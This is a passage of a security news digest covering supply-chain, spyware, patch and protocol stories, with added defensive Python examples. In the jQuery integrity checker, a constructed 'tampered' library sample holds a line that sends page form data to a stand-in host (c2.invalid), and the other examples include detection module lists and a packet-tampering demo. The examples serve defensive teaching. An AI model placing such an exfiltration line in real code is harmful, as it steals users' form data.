Daily Drop (814): HuiOne | GuardZoo | RU: RT Bots | jQuery NPM | MSS: APT40 | Cyber HUMINT | Jenkins Script | BlastRADIUS | OpenSSH | ViperSoftX | Patch Tuesday | Hide & Seek | RU: Space Weapons
07-11-24
Wednesday, Jul 11 2024 // (IG): BB // ShadowNews // Coffee for Bob
*Started adding Proof of Concepts (PoCs), where available, for the CVEs mentioned:
In vulnerability disclosure, a Proof of Concept (PoC) is a minimal working demonstration that a reported flaw can actually be triggered: typically a short program, request sequence or crafted input that reproduces the faulty behaviour, without the full payload a weaponized exploit would carry. Its purpose is to confirm that the bug is real and to show its preconditions and impact before anyone commits to a fix, a detection rule or a full exploit. A public PoC also shortens the window defenders have; the APT40 advisory covered below notes that the group turns PoCs into working exploitation within hours or days of release. *
“Fears Over Russian Space-Based Indiscriminate Weapons”
Bottom Line Up Front (BLUF): Russia's recent satellite launch, Cosmos 2576, raises significant concerns about the potential weaponization of space. With the ability to disrupt low-earth orbit assets and the threat of indiscriminate nuclear-armed satellites, the global balance of power and space security treaties are at risk. This development may necessitate a robust response from the United States and its allies to safeguard their space-based systems.
Analyst Comments: The launch of Cosmos 2576 marks a concerning escalation in space militarization. Given Russia's historical and current capabilities, the deployment of counter-space weapons, including nuclear-armed satellites, could severely undermine global satellite infrastructure. This move challenges existing treaties and could trigger a new space arms race, compelling nations like the United States and China to enhance their defensive and offensive space capabilities. Diplomatic efforts and strategic alliances will be critical in addressing this emerging threat.
FROM THE MEDIA: Russia's launch of the Cosmos 2576 satellite from Plesetsk Cosmodrome has raised alarms in the United States and among international observers. U.S. officials believe this satellite could be a counter-space weapon aimed at low-earth orbit (LEO) satellites, including critical assets like reconnaissance satellites, the Hubble Telescope, and the International Space Station. The Outer Space Treaty of 1967, signed by 115 countries including the U.S., Russia, and China, prohibits the deployment of nuclear weapons in Earth orbit or on any celestial body. Despite this, historical precedents from both the U.S. and Soviet Union show a long-standing interest in developing space-based weapon systems. The U.S. revised its National Space Policy in 2006 to allow military actions in space to protect its assets, indirectly paving the way for space weaponization.
READ THE STORY: PR
Supply Chain Attack: Trojanized jQuery Packages Found on npm, GitHub, and jsDelivr
Bottom Line Up Front (BLUF): Threat actors have deployed a sophisticated supply chain attack involving trojanized versions of jQuery across npm, GitHub, and jsDelivr repositories. The malicious packages, which exfiltrate form data via a compromised "end" function, highlight the ongoing vulnerabilities in software supply chains.
Analyst Comments: This incident underscores the need for disciplined dependency management. By altering a function deep inside a library as ubiquitous as jQuery, and one that is only reached indirectly through a popular helper, attackers introduce code that casual review will not catch. Organizations should pin dependencies to exact versions with lockfile integrity hashes, serve CDN-hosted scripts with Subresource Integrity so a swapped file fails to load, and review lockfile changes as carefully as application code. The variability in the attacker's approach suggests a highly manual process, indicating a deliberate and targeted effort, and the case illustrates the broader need for continuous verification of the integrity of the open-source code an organization actually runs.
FROM THE MEDIA: Unknown threat actors have launched a complex supply chain attack by disseminating trojanized versions of jQuery on npm, GitHub, and jsDelivr. The cybersecurity firm Phylum identified 68 malicious packages, first published on npm between May 26 and June 23, 2024, under names such as cdnjquery, footersicons, and jqueryxxx. The attack modifies the seldom-used "end" function within jQuery, which the popular "fadeTo" animation utility calls internally, so that it exfiltrates website form data to a remote server. The inconsistent package names and hand-assembled packages point to a deliberate, largely manual operation rather than an automated campaign, which also helps it evade signature-based detection.
READ THE STORY: THN
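The defensive control that would have caught a swapped jQuery in either place it was served is an integrity pin: a Subresource Integrity (SRI) attribute on the CDN script tag, or the `integrity` field in an npm lockfile, both of which use the same `<algo>-<base64 digest>` format. The following is an added example, not code from Phylum, jQuery or the article; the two library bodies are constructed stand-ins for a clean and a tampered file, and the CDN URL is a placeholder.

```python
"""Added example (not Phylum's, jQuery's or THN's code): one integrity checker
for the two places a swapped jQuery would have been caught.

Browser Subresource Integrity (SRI) attributes and npm's package-lock.json
"integrity" field share the format "<algo>-<base64 digest>", so the same
function verifies a jsDelivr <script> tag and a lockfile entry.  The library
bodies below are constructed stand-ins, not the real jQuery or the real trojan.
"""
import base64
import hashlib
import hmac

SRI_ALGOS = ("sha256", "sha384", "sha512")

# Constructed stand-ins.  The tampered copy mirrors the reported pattern: the
# rarely called end() gains a side effect, while fadeTo(), which reaches end()
# internally, reads exactly as before.
GOOD_LIB = (
    "jQuery.fn.end = function(){ return this.prevObject || this.constructor(); };\n"
    "jQuery.fn.fadeTo = function(s, to){ return this.filter(':visible').end(); };\n"
).encode()
TAMPERED_LIB = GOOD_LIB.replace(
    b"return this.prevObject",
    b"navigator.sendBeacon('https://c2.invalid/f', jQuery('form').serialize()); return this.prevObject",
)


def integrity_string(data: bytes, algo: str = "sha384") -> str:
    """Produce the SRI / lockfile integrity value for the bytes you actually reviewed."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"SRI allows only {SRI_ALGOS}")
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_integrity(data: bytes, pinned: str) -> bool:
    """True only if data matches at least one well-formed pinned entry.

    SRI allows several space-separated alternatives; lockfiles carry one.
    Unknown algorithms (md5, sha1) and malformed base64 count as no match,
    so a weakened or garbled pin fails closed instead of being skipped.
    """
    for entry in pinned.split():
        algo, _, expected_b64 = entry.partition("-")
        if algo not in SRI_ALGOS or not expected_b64:
            continue
        try:
            expected = base64.b64decode(expected_b64, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        # compare_digest returns False on a length mismatch rather than raising
        if hmac.compare_digest(hashlib.new(algo, data).digest(), expected):
            return True
    return False


def script_tag(url: str, data: bytes) -> str:
    """Emit the <script> tag that pins a CDN copy to the reviewed bytes."""
    return (f'<script src="{url}" integrity="{integrity_string(data)}" '
            f'crossorigin="anonymous"></script>')


def demo() -> dict:
    pinned = integrity_string(GOOD_LIB)
    return {
        "good": verify_integrity(GOOD_LIB, pinned),
        "tampered": verify_integrity(TAMPERED_LIB, pinned),
        # md5 pin of the empty string: a downgraded algorithm must not be honoured
        "weak_pin": verify_integrity(GOOD_LIB, "md5-1B2M2Y8AsgTpgAmY7PhCfg=="),
        # SRI lets a tag list alternatives; one good entry is enough
        "two_alternatives": verify_integrity(GOOD_LIB, "sha256-AAAA " + pinned),
    }


if __name__ == "__main__":
    # Placeholder URL: the tag is what you paste into the page once reviewed
    print(script_tag("https://cdn.example/jquery.min.js", GOOD_LIB))
    print(demo())
```

The browser refuses to execute a script whose bytes do not match the `integrity` attribute, and `npm ci` refuses to install a tarball whose hash differs from the lockfile, so the pin has to be generated from a copy you have actually read, not from whatever the CDN serves today.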
GuardZoo: Pro-Houthi Spyware Targets Militaries Across the Middle East
Bottom Line Up Front (BLUF): A pro-Houthi hacker group has been deploying the GuardZoo spyware since 2019 to target military personnel and organizations across the Middle East. The malware, which infiltrates devices via military-themed applications and other lures, collects sensitive data and can install additional malicious applications. The primary targets are located in Yemen, Saudi Arabia, Egypt, and Oman.
Analyst Comments: The emergence of GuardZoo spyware attributed to pro-Houthi hackers highlights the evolving cyber threat landscape in the Middle East. This group's ability to target military entities and gather extensive data, including location and communication details, underscores the strategic use of cyber tools in regional conflicts. The use of military-themed lures and the spyware's capabilities to introduce new invasive functionalities pose significant risks to military operations and personnel security. The ongoing geopolitical tensions in the region will likely drive further sophistication and deployment of such cyber tactics.
FROM THE MEDIA: Pro-Houthi hackers have been deploying the GuardZoo spyware to target militaries across the Middle East since 2019, according to a new report by Lookout, a mobile security firm. The spyware, attributed to a Houthi-aligned threat actor, has infected around 450 devices in countries including Yemen, Saudi Arabia, Egypt, Oman, the UAE, Turkey, and Qatar. GuardZoo malware is used to collect photos, documents, and other sensitive files from infected devices. It can also gather location data, and device information, and even download and install arbitrary applications, enabling further invasive actions.
READ THE STORY: The Record
Critical Windows Licensing Bugs and Exploited Vulnerabilities Highlight July Patch Tuesday
Bottom Line Up Front (BLUF): Microsoft's July Patch Tuesday addresses over 130 CVEs, including two actively exploited vulnerabilities in Windows Hyper-V and MSHTML. Citrix, SAP, and Fortinet shipped critical fixes in the same cycle, underscoring the urgency of prompt deployment to limit exploitation.
Analyst Comments: The July Patch Tuesday underscores the increasing complexity and urgency in maintaining cybersecurity defenses. With at least two vulnerabilities under active exploitation and several others deemed critical, administrators must prioritize testing and deploying these patches to prevent potential breaches. The inclusion of Citrix and SAP in this cycle highlights the broad spectrum of targets that attackers are willing to exploit. It's crucial for organizations to audit and update their systems promptly, focusing particularly on internet-facing services and applications.
FROM THE MEDIA: Microsoft's July Patch Tuesday brings a significant number of updates, addressing over 130 CVEs. Key among these are two actively exploited vulnerabilities: CVE-2024-38080 in Windows Hyper-V, rated 7.8 CVSS, and CVE-2024-38112, a 7.5 CVSS-rated spoofing flaw in MSHTML. The former could allow attackers to gain system privileges, making it a potential tool for ransomware operations. The latter requires user interaction but has already been exploited in the wild, indicating the ease with which social engineering can trigger malicious actions.
READ THE STORY: The Register // The Stack
ViperSoftX Malware Disguises as eBooks on Torrents to Spread Stealthy Attacks
Bottom Line Up Front (BLUF): The ViperSoftX malware has evolved to distribute itself as eBooks over torrent sites. Utilizing the Common Language Runtime (CLR) to load PowerShell commands within AutoIt, this sophisticated malware evades detection and executes various malicious functions, including cryptocurrency theft and system data exfiltration.
Analyst Comments: The adaptation of ViperSoftX to distribute itself as eBooks on torrent sites marks a significant evolution in its delivery method. This tactic capitalizes on the popularity of pirated content to spread malware. The integration of CLR and PowerShell within AutoIt demonstrates the malware's advanced capabilities to avoid detection and maintain persistence. Security teams must prioritize awareness and proactive defenses against such evolving threats, emphasizing the need for robust monitoring and strict policies regarding the use of torrent sites within corporate environments.
FROM THE MEDIA: ViperSoftX, a sophisticated malware initially detected in 2020, has been observed spreading through torrents disguised as eBooks. Researchers from Trellix noted that the current variant of ViperSoftX uses the Common Language Runtime (CLR) to dynamically load and execute PowerShell commands within AutoIt, effectively creating a PowerShell environment for its operations. This approach allows the malware to evade traditional detection mechanisms that might flag standalone PowerShell activity.
READ THE STORY: THN
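The detection opportunity in the behaviour described above is that a scripting interpreter which has no business hosting .NET suddenly maps the Common Language Runtime and the PowerShell engine assembly, while powershell.exe never appears in process telemetry. The following correlation rule is an added example, not Trellix's detection content; the event shapes follow Sysmon's ProcessCreate (Event 1) and ImageLoad (Event 7) fields, the records, paths and PIDs are constructed, and the AUTOIT_HOSTS, CLR_BOOTSTRAP and POWERSHELL_ENGINE lists are this analyst's assumptions rather than a vendor indicator set.

```python
"""Added example (not Trellix's detection content): a correlation rule over
constructed Sysmon-style events for an AutoIt interpreter bootstrapping the
.NET CLR to host PowerShell without powershell.exe ever starting.

Event 1 (ProcessCreate) carries the process image and its PE OriginalFileName,
Event 7 (ImageLoad) carries each DLL mapped into the process.  Records, paths
and PIDs are made up; the module lists are the analyst's, not a vendor set.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath

AUTOIT_HOSTS = {"autoit3.exe", "autoit3_x64.exe"}
CLR_BOOTSTRAP = {"mscoree.dll", "clr.dll", "clrjit.dll"}
POWERSHELL_ENGINE = {"system.management.automation.dll"}


@dataclass(frozen=True)
class Event:
    event_id: int                  # 1 = ProcessCreate, 7 = ImageLoad
    process_id: int
    image: str                     # process executable (both event types)
    original_file_name: str = ""   # Event 1 only: PE header name, survives renaming
    image_loaded: str = ""         # Event 7 only: the DLL mapped into the process


DL = r"C:\Users\reader\Downloads\Bestseller_2024"          # constructed torrent drop folder
FW = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319"
GAC = r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    Event(1, 4100, DL + r"\AutoIt3.exe", original_file_name="AutoIt3.exe"),
    Event(7, 4100, DL + r"\AutoIt3.exe", image_loaded=r"C:\Windows\System32\mscoree.dll"),
    Event(7, 4100, DL + r"\AutoIt3.exe", image_loaded=FW + r"\clr.dll"),
    Event(7, 4100, DL + r"\AutoIt3.exe", image_loaded=GAC + r"\System.Management.Automation.dll"),
    Event(1, 4200, DL + r"\reader.exe", original_file_name="AutoIt3.exe"),   # renamed interpreter
    Event(7, 4200, DL + r"\reader.exe", image_loaded=r"C:\Windows\System32\mscoree.dll"),
    Event(1, 5000, PS, original_file_name="PowerShell.EXE"),                  # CLR in PowerShell is normal
    Event(7, 5000, PS, image_loaded=FW + r"\clr.dll"),
    Event(1, 5100, r"C:\Program Files (x86)\AutoIt3\AutoIt3.exe", original_file_name="AutoIt3.exe"),
    Event(7, 5100, r"C:\Program Files (x86)\AutoIt3\AutoIt3.exe", image_loaded=r"C:\Windows\System32\kernel32.dll"),
]


def detect_clr_in_autoit(events):
    """Return one finding per AutoIt process that pulls in the CLR.

    Severity is 'high' when the PowerShell engine assembly itself is mapped
    (the pattern the report describes) and 'medium' for CLR bootstrap alone,
    which legitimate AutoIt scripts can trigger through .NET COM interop, so
    a medium hit is a triage item rather than an alert on its own.
    """
    procs = {e.process_id: e for e in events if e.event_id == 1}
    loads = {}
    for e in events:
        if e.event_id != 7 or e.process_id not in procs:
            continue
        p = procs[e.process_id]
        # Match on the on-disk name OR the PE's internal name, so renaming the
        # interpreter to reader.exe does not evade the rule.
        names = {PureWindowsPath(p.image).name.lower(), p.original_file_name.lower()}
        if not names & AUTOIT_HOSTS:
            continue
        loads.setdefault(e.process_id, set()).add(PureWindowsPath(e.image_loaded).name.lower())

    findings = []
    for pid, dlls in sorted(loads.items()):
        if dlls & POWERSHELL_ENGINE:
            severity = "high"
        elif dlls & CLR_BOOTSTRAP:
            severity = "medium"
        else:
            continue
        findings.append({"pid": pid, "image": procs[pid].image, "severity": severity,
                         "modules": sorted(dlls & (CLR_BOOTSTRAP | POWERSHELL_ENGINE))})
    return findings


if __name__ == "__main__":
    for f in detect_clr_in_autoit(EVENTS):
        print(f)
```

The rule needs both event types because the image-load event alone does not tell you what the process really is; correlating on the ProcessCreate record's OriginalFileName is what catches the renamed interpreter in the second process.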
US Disrupts AI-Driven Russian Bot Farm on Twitter
Bottom Line Up Front (BLUF): A collaborative international law enforcement operation led by the U.S. Justice Department has dismantled a sophisticated Russian bot farm that used AI to propagate disinformation on Twitter. Nearly 1,000 Twitter accounts and several domains used to manage the bots were taken down. The bot farm was managed by affiliates of the Russian state-run news organization Russia Today (RT) and aimed at influencing public opinion and exacerbating discord in multiple countries.
Analyst Comments: The dismantling of this AI-powered bot farm represents a significant step in combating state-sponsored disinformation campaigns. The use of AI in creating authentic-looking social media profiles marks an escalation in the sophistication of propaganda tools used by state actors. This operation underscores the importance of international collaboration in addressing the complex challenges posed by cyber threats. The ability of these bots to influence geopolitical narratives underscores the need for continuous vigilance and enhanced cybersecurity measures across social media platforms.
FROM THE MEDIA: A large-scale international operation has disrupted a Russian bot farm managed by Russia Today (RT) affiliates and a Russian FSB officer, which has been disseminating disinformation on Twitter since 2022. The AI-enabled software, Meliorator, was used to create and manage nearly 1,000 Twitter accounts posing as real people from various countries, including the United States, Poland, Germany, and Ukraine. The bot farm's purpose was to amplify false narratives and align with Russian geopolitical interests, especially regarding the conflict in Ukraine. The operation, led by the U.S. Justice Department and supported by agencies from Canada and the Netherlands, resulted in the seizure of domains and the takedown of the bot accounts.
READ THE STORY: The Register // Bleeping Computer
Cybersecurity Agencies Warn of China-linked APT40's Rapid Exploit Adaptation
Bottom Line Up Front (BLUF): Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand, South Korea, the U.K., and the U.S. have issued a joint advisory about APT40, a China-linked cyber espionage group. The advisory underscores APT40's ability to rapidly adapt and weaponize newly disclosed vulnerabilities, posing significant threats to global cybersecurity.
Analyst Comments: APT40's proficiency in quickly co-opting exploits for newly disclosed security flaws showcases the group's advanced capabilities and operational agility. This ability to swiftly weaponize proofs-of-concept emphasizes the need for organizations to implement robust, proactive security measures. Regular updates, patch management, and comprehensive network monitoring are essential to mitigate risks. The advisory also highlights the broader geopolitical implications of cyber espionage activities orchestrated by state-sponsored groups, underscoring the critical need for international cooperation in cybersecurity defense.
FROM THE MEDIA: Cybersecurity agencies from multiple countries have released a joint advisory warning about APT40, a China-linked cyber espionage group. Known for its rapid adaptation to newly disclosed vulnerabilities, APT40 has previously targeted organizations in countries including Australia and the United States. The group, active since at least 2011, is affiliated with China's Ministry of State Security (MSS). APT40 is notorious for its ability to transform vulnerability proofs-of-concept into targeted exploitation operations within hours or days of public release. This capability has been demonstrated through various campaigns, including the use of the ScanBox reconnaissance framework and exploiting a WinRAR security flaw (CVE-2023-38831) in phishing campaigns.
READ THE STORY: THN // The Record
Navigating the Maze of Modern Data Breaches: Essential Strategies for Cybersecurity Practitioners and Data Owners to Secure Data Across the Entire Enterprise
Bottom Line Up Front (BLUF): Data breaches have become increasingly complex, with data scattered across various environments. Effective incident detection, response, and recovery strategies are critical for cybersecurity practitioners and data owners to mitigate damage and protect sensitive information.
Analyst Comments: James Azar’s insights highlight the ongoing challenges in modern cybersecurity, particularly around data breach management. The emphasis on proactive detection and coordinated response is crucial, especially as threat actors become more sophisticated. Practitioners must continually evolve their strategies, integrating advanced tools like SIEM systems and maintaining robust incident response protocols. Understanding the distributed nature of data and the necessity for comprehensive security measures can significantly reduce breach impacts.
FROM THE MEDIA: James Azar discusses the multifaceted challenges of managing and locating data during a breach, emphasizing the need for effective mitigation strategies. Data breaches have grown in complexity, driven by both sophisticated nation-state actors and opportunistic cybercriminals. The primary challenge is the modern data ecosystem, which is vast, distributed, and decentralized, spanning cloud environments, endpoint devices, and third-party service providers.
READ THE STORY: CISOTALK
Russia Begins Influence Operations Targeting 2024 U.S. Presidential Election
Bottom Line Up Front (BLUF): U.S. intelligence officials report that Russia has started efforts to influence the 2024 U.S. presidential election, favoring former President Donald Trump. The operations involve targeting specific voter demographics, spreading divisive narratives, and undermining support for Ukraine. This marks a continuation of strategies observed in the 2016 and 2020 elections.
Analyst Comments: The revelation that Russia is already engaging in influence operations for the 2024 U.S. presidential election is indicative of a persistent and evolving threat to American electoral integrity. The use of sophisticated techniques, including outsourcing to commercial firms and leveraging encrypted messaging platforms, highlights Moscow's adaptability. The continuation of these efforts underscores the importance of vigilance and robust countermeasures by U.S. intelligence and cybersecurity agencies to safeguard the democratic process.
FROM THE MEDIA: Russia has commenced attempts to influence the 2024 U.S. presidential election, aiming to favor former President Donald Trump, according to a U.S. intelligence official. These efforts involve targeting specific voter demographics, promoting divisive narratives, and denigrating particular politicians. The intelligence community observed similar strategies in the 2016 and 2020 elections. An official from the Office of the Director of National Intelligence (ODNI) noted that Russia is employing a variety of methods to amplify its messaging, including outsourcing tasks to commercial firms to obscure its involvement. Additionally, influence actors are using social media covertly to target swing state voters and reduce U.S. support for Ukraine.
READ THE STORY: The Record
Hackers Exploiting Jenkins Script Console for Cryptocurrency Mining Attacks
Bottom Line Up Front (BLUF): Attackers are leveraging misconfigured Jenkins Script Console instances to execute remote code and deploy cryptocurrency miners. Ensuring proper configuration, robust authentication, and regular audits can mitigate these risks.
Analyst Comments: The exploitation of the Jenkins Script Console highlights the critical need for secure configurations in continuous integration and delivery platforms. The ability to run arbitrary Groovy scripts on the controller, if improperly secured, provides an open gateway for malicious actors to execute harmful code. Practitioners should confirm that the controller requires authentication, that no anonymous user holds Overall/Administer, that self-registration is disabled, and that the instance is not directly reachable from the internet; the Script Console and its scriptText endpoint are gated only by Overall/Administer, so any path to that permission is a path to code execution on the controller.
FROM THE MEDIA: Attackers are exploiting misconfigured Jenkins Script Console instances to conduct cryptocurrency mining attacks, according to cybersecurity researchers from Trend Micro. Jenkins, a widely used CI/CD platform, features a Groovy script console that allows users to run arbitrary scripts within the Jenkins controller runtime. When authentication mechanisms are improperly configured, the "/script" endpoint can become accessible to attackers, enabling remote code execution (RCE). The Jenkins documentation warns that granting Script Console access is akin to providing full administrative rights, posing significant security risks if misconfigured.
READ THE STORY: THN
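The misconfigurations that expose the Script Console live in the controller's global security settings, which Jenkins persists in $JENKINS_HOME/config.xml. The following audit script is an added example, not Trend Micro's or the Jenkins project's code; the element and class names (useSecurity, authorizationStrategy, securityRealm, denyAnonymousReadAccess, disableSignup) are the ones Jenkins writes, while the three sample documents are constructed.

```python
"""Added example (not Trend Micro's or the Jenkins project's code): audit a
Jenkins controller's $JENKINS_HOME/config.xml for the settings that leave the
Script Console (/script and /scriptText) reachable without a real admin login.

Element and class names are the ones Jenkins writes; the three documents below
are constructed samples, not captures from a real controller.
"""
import xml.etree.ElementTree as ET

FULL_CONTROL = "hudson.security.FullControlOnceLoggedInAuthorizationStrategy"

# "Anyone can do anything" with security switched off: /script is open to the network.
UNSECURED = """<hudson>
  <useSecurity>false</useSecurity>
  <authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>
</hudson>
"""

# Security on, but new accounts can be self-registered and every logged-in
# user is an administrator: register, log in, open /script.
SIGNUP_OPEN = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>false</disableSignup>
  </securityRealm>
</hudson>
"""

HARDENED = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
  </securityRealm>
</hudson>
"""


def _flag(element, child, default="false"):
    return (element.findtext(child) or default).strip().lower() == "true"


def audit_config(xml_text: str) -> list:
    """Return human-readable findings; an empty list means nothing was flagged."""
    root = ET.fromstring(xml_text)
    findings = []

    if not _flag(root, "useSecurity"):
        findings.append("useSecurity is not true: no authentication at all, "
                        "/script is open to anyone who can reach the port")

    strategy = root.find("authorizationStrategy")
    cls = strategy.get("class", "") if strategy is not None else ""
    if not cls or cls.endswith("AuthorizationStrategy$Unsecured"):
        findings.append("authorizationStrategy is Unsecured or absent ('Anyone can do anything'): "
                        "anonymous holds Overall/Administer")
    elif cls == FULL_CONTROL and not _flag(strategy, "denyAnonymousReadAccess"):
        findings.append("anonymous read access enabled: unauthenticated users can enumerate "
                        "jobs, plugins and the version banner")

    realm = root.find("securityRealm")
    if (realm is not None and realm.get("class", "").endswith("HudsonPrivateSecurityRealm")
            and cls == FULL_CONTROL and not _flag(realm, "disableSignup")):
        findings.append("self-signup enabled while every logged-in user is an administrator: "
                        "anyone can register and land in the Script Console")
    return findings


if __name__ == "__main__":
    for name, doc in (("UNSECURED", UNSECURED), ("SIGNUP_OPEN", SIGNUP_OPEN), ("HARDENED", HARDENED)):
        print(name, audit_config(doc) or "clean")
```

Run it against the real file on the controller (or against a copy pulled by configuration management) as part of a scheduled check; a matrix-based or role-based strategy will need its own rules for who holds Overall/Administer, which the sample above deliberately does not guess at.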
RADIUS Protocol Vulnerability Exposes Networks to MitM Attacks
Bottom Line Up Front (BLUF): A critical security vulnerability, dubbed BlastRADIUS, has been discovered in the RADIUS network authentication protocol, exposing networks to Mallory-in-the-Middle (MitM) attacks. An attacker positioned between a RADIUS client and server can forge the server's reply so that a rejected login is accepted, and because the weakness lies in the protocol's MD5-based integrity check rather than in any one product, every standards-compliant deployment that still runs RADIUS over UDP without the Message-Authenticator attribute is exposed.
Analyst Comments: The BlastRADIUS vulnerability underscores the ongoing risks of legacy protocols like RADIUS that still depend on MD5. The ability to turn an Access-Reject into an Access-Accept without detection is a severe threat to network access control, above all for ISPs and organizations that carry RADIUS/UDP over the internet or other networks they do not control. Vendor fixes make clients and servers both send and require the Message-Authenticator attribute (an HMAC-MD5 keyed with the shared secret) on every Access-Request and its response; the attribute only protects once both ends are updated and the server is configured to require it, so patch both sides and then turn on enforcement. Longer term, move RADIUS off bare UDP onto RADIUS over TLS (RadSec) or tunnel it inside IPsec.
FROM THE MEDIA: A newly discovered security vulnerability in the RADIUS network authentication protocol, identified as BlastRADIUS (CVE-2024-3596), could be exploited to perform Mallory-in-the-Middle (MitM) attacks. An Access-Request carries no integrity protection unless it includes a Message-Authenticator attribute, so an on-path attacker can alter it in flight; by inserting attacker-chosen data computed with an MD5 chosen-prefix collision, the attacker arranges for the server's Access-Reject to carry the same Response Authenticator the client would expect on an Access-Accept, then forwards a forged Access-Accept that passes the client's check. RADIUS, or Remote Authentication Dial-In User Service, is widely used for centralized authentication, authorization, and accounting (AAA) management. Its response integrity rests on a hash derived with the now-cryptographically broken MD5 algorithm, so the issue is a design flaw of the protocol rather than an implementation bug, and all standards-compliant RADIUS clients and servers are susceptible. Password-based methods carried over RADIUS/UDP (PAP, CHAP, MS-CHAP) are affected; EAP-based methods such as 802.1X already require Message-Authenticator and are not.
READ THE STORY: THN
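To see why the Message-Authenticator attribute is the fix, it helps to build both RADIUS integrity mechanisms from the RFCs and watch what each one catches. The block below is an added example, not code from the BlastRADIUS researchers or the article: it implements the Response Authenticator of RFC 2865 (the MD5 value the collision targets) and the Message-Authenticator of RFC 2869 (HMAC-MD5 keyed with the shared secret), then shows that an altered Access-Request without Message-Authenticator gives the server nothing to verify, while the same alteration is caught once the attribute is present. The shared secret, user name and packet identifier are constructed, and the "naive forgery" is a plain code flip, not the collision the real attack uses.

```python
"""Added example (not from the BlastRADIUS researchers or THN): the two RADIUS
integrity mechanisms side by side, built from RFC 2865 and RFC 2869.

Response Authenticator = MD5(Code|ID|Length|RequestAuth|Attributes|Secret) is
what BlastRADIUS collides.  An Access-Request has no integrity check at all
unless it carries Message-Authenticator (HMAC-MD5 keyed with the shared
secret), which is why requiring that attribute is the remediation.
Secret, user name and identifier below are constructed values.
"""
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, MESSAGE_AUTHENTICATOR = 1, 80
HEADER_LEN = 20


def encode_attrs(attrs):
    """Type(1) Length(1) Value; Length covers the two header bytes."""
    return b"".join(bytes([t, len(v) + 2]) + v for t, v in attrs)


def parse_attrs(packet):
    attrs, i = [], HEADER_LEN
    while i + 2 <= len(packet):
        t, length = packet[i], packet[i + 1]
        if length < 2 or i + length > len(packet):
            raise ValueError("malformed attribute")
        attrs.append((t, packet[i + 2:i + length]))
        i += length
    return attrs


def build_packet(code, ident, authenticator, attrs):
    body = encode_attrs(attrs)
    return struct.pack("!BBH", code, ident, HEADER_LEN + len(body)) + authenticator + body


def response_authenticator(code, ident, attrs, request_auth, secret):
    """RFC 2865 section 3: the server's only integrity value on a response."""
    body = encode_attrs(attrs)
    header = struct.pack("!BBH", code, ident, HEADER_LEN + len(body))
    return hashlib.md5(header + request_auth + body + secret).digest()


def verify_response(response, request_auth, secret):
    """Client-side check: recompute the Response Authenticator and compare."""
    expected = hashlib.md5(response[:4] + request_auth + response[HEADER_LEN:] + secret).digest()
    return hmac.compare_digest(expected, response[4:HEADER_LEN])


def sign_request(code, ident, request_auth, attrs, secret):
    """RFC 2869 section 5.14: HMAC-MD5 over the packet with the attribute value zeroed."""
    placeholder = attrs + [(MESSAGE_AUTHENTICATOR, bytes(16))]
    mac = hmac.new(secret, build_packet(code, ident, request_auth, placeholder), hashlib.md5).digest()
    return build_packet(code, ident, request_auth, attrs + [(MESSAGE_AUTHENTICATOR, mac)])


def verify_message_authenticator(packet, secret):
    """None when the attribute is absent (nothing a server can check), else True/False."""
    attrs = parse_attrs(packet)
    macs = [v for t, v in attrs if t == MESSAGE_AUTHENTICATOR]
    if not macs:
        return None
    zeroed = [(t, bytes(16) if t == MESSAGE_AUTHENTICATOR else v) for t, v in attrs]
    expected = hmac.new(secret, packet[:HEADER_LEN] + encode_attrs(zeroed), hashlib.md5).digest()
    return hmac.compare_digest(expected, macs[0])


def replace_attr(packet, attr_type, new_value):
    """What an on-path attacker does: swap one attribute, keep the authenticator."""
    attrs = [(t, new_value if t == attr_type else v) for t, v in parse_attrs(packet)]
    return build_packet(packet[0], packet[1], packet[4:HEADER_LEN], attrs)


def demo(secret=b"constructed-shared-secret"):
    ident, request_auth = 7, os.urandom(16)
    attrs = [(USER_NAME, b"alice")]

    legacy = build_packet(ACCESS_REQUEST, ident, request_auth, attrs)      # no Message-Authenticator
    signed = sign_request(ACCESS_REQUEST, ident, request_auth, attrs, secret)

    accept = build_packet(ACCESS_ACCEPT, ident,
                          response_authenticator(ACCESS_ACCEPT, ident, [], request_auth, secret), [])
    reject = build_packet(ACCESS_REJECT, ident,
                          response_authenticator(ACCESS_REJECT, ident, [], request_auth, secret), [])
    # Flipping the code byte alone fails the client's check; BlastRADIUS works by
    # first tampering with the request so Reject and Accept share one authenticator.
    naive_forgery = bytes([ACCESS_ACCEPT]) + reject[1:]

    return {
        "legacy_tampered": verify_message_authenticator(replace_attr(legacy, USER_NAME, b"mallory"), secret),
        "signed_ok": verify_message_authenticator(signed, secret),
        "signed_tampered": verify_message_authenticator(replace_attr(signed, USER_NAME, b"mallory"), secret),
        "accept_ok": verify_response(accept, request_auth, secret),
        "naive_forgery": verify_response(naive_forgery, request_auth, secret),
    }


if __name__ == "__main__":
    print(demo())
```

The `None` result for the legacy request is the whole problem in one value: a server receiving a modified Access-Request without Message-Authenticator has no computation it can run to notice, which is the freedom the collision attack needs. Requiring the attribute turns that into a hard `False`, and the HMAC keys on the shared secret so an attacker without it cannot recompute the tag.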
New OpenSSH Vulnerability Discovered: Potential Remote Code Execution Risk
